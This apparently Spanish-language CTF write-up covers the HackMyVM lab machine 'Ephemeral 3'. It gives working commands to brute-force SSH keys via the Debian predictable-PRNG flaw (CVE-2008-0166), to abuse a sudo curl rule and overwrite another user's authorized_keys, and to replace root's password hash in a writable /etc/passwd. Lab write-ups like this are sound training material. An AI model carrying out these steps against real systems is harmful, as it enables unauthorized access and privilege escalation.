cd ~/blog

~/writeups/hmv/066-ephemeral_3.md

066 - Ephemeral 3

easy Linux hmv 13-04-2024
Debian OpenSSL Predictable PRNG (CVE-2008-0166)sudo curl file write (authorized_keys)Writable /etc/passwd Privesc
hackmyvm.eu/machines/machine.php?vm=Ephemeral3

~1 min de lectura


Comenzamos con la enumeración de puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.33
 nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.33
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-13 10:37 -04
Nmap scan report for 192.168.1.33
Host is up (0.00033s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 f0:f2:b8:e0:da:41:9b:96:3b:b6:2b:98:95:4c:67:60 (RSA)
|   256 a8:cd:e7:a7:0e:ce:62:86:35:96:02:43:9e:3e:9a:80 (ECDSA)
|_  256 14:a7:57:a9:09:1a:7e:7e:ce:1e:91:f3:b1:1d:1b:fd (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.59 seconds

Enumeramos con gobuster:

 gobuster dir -u 'http://192.168.1.33' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png,sql,sh,pdf -r
...
/note.txt             (Status: 200) [Size: 159]
/agency               (Status: 200) [Size: 18726]
...

El note.txt da la pista clave (claves generadas con OpenSSL):

Hey! I just generated your keys with OpenSSL. You should be able to use your private key now!

If you have any questions just email me at henry@ephemeral.com

Con whatweb obtenemos un segundo usuario:

 whatweb http://192.168.1.33/agency/
http://192.168.1.33/agency/ [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[randy@ephemeral.com], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.1.33], JQuery[3.1.1], Script, Title[Agency Perfect], X-UA-Compatible[IE=edge]

Tenemos randy y henry. La mención de OpenSSL apunta al fallo de PRNG predecible de Debian:

 searchsploit openssl ssh
...
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5720.py
...

Descargamos las claves precomputadas y hacemos fuerza bruta de la clave de randy:

 wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
 tar -xvf 5622.tar.bz2

 python2 5720.py rsa/2048/  192.168.1.33 randy 22 5
-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
...
Key Found in file: 0028ca6d22c68ed0a1e3f6f79573100a-31671
Execute: ssh -lrandy -p22 -i rsa/2048//0028ca6d22c68ed0a1e3f6f79573100a-31671 192.168.1.33

Tested 20604 keys | Remaining 12164 keys | Aprox. Speed 15/sec

Nos conectamos con la clave encontrada:

 cp rsa/2048//0028ca6d22c68ed0a1e3f6f79573100a-31671 ../content/id_rsa
 chmod 600 id_rsa
 ssh randy@192.168.1.33 -i id_rsa
randy@ephemeral:~$

Para movernos a henry, revisamos sudo -l:

randy@ephemeral:~$ sudo -l
Matching Defaults entries for randy on ephemeral:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User randy may run the following commands on ephemeral:
    (henry) NOPASSWD: /usr/bin/curl

Podemos ejecutar curl como henry, que permite escribir archivos (file:// + -o). Colocamos nuestro authorized_keys en el home de henry:

randy@ephemeral:/tmp$ echo 'ssh-rsa ... > authorized_keys
randy@ephemeral:/home/henry$ sudo -u henry curl file:///tmp/authorized_keys -o /home/henry/.ssh/authorized_keys

❯ ssh henry@192.168.1.33 -i id_rsa_pwned
Enter passphrase for key 'id_rsa_pwned': 1234
henry@ephemeral:~$

Obtenemos la primera flag. Para escalar a root, comprobamos que /etc/passwd es escribible (Writable Critical Files Privesc):

henry@ephemeral:~$ ls -l /etc/passwd
-rw-rw-r-- 1 root henry 2891 Jun 24  2022 /etc/passwd

Generamos un hash con openssl y reemplazamos la contraseña de root:

 openssl passwd -1
Password: 1234
Verifying - Password: 1234
$1$ZqQxvw4D$Q0ATKAkFL/5lzj0hUI1600

henry@ephemeral:~$ nano /etc/passwd
henry@ephemeral:~$ cat /etc/passwd
...
root:$1$ZqQxvw4D$Q0ATKAkFL/5lzj0hUI1600:0:0:root:/root:/bin/bash
...

henry@ephemeral:~$ su root
Password:
root@ephemeral:/home/henry#

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados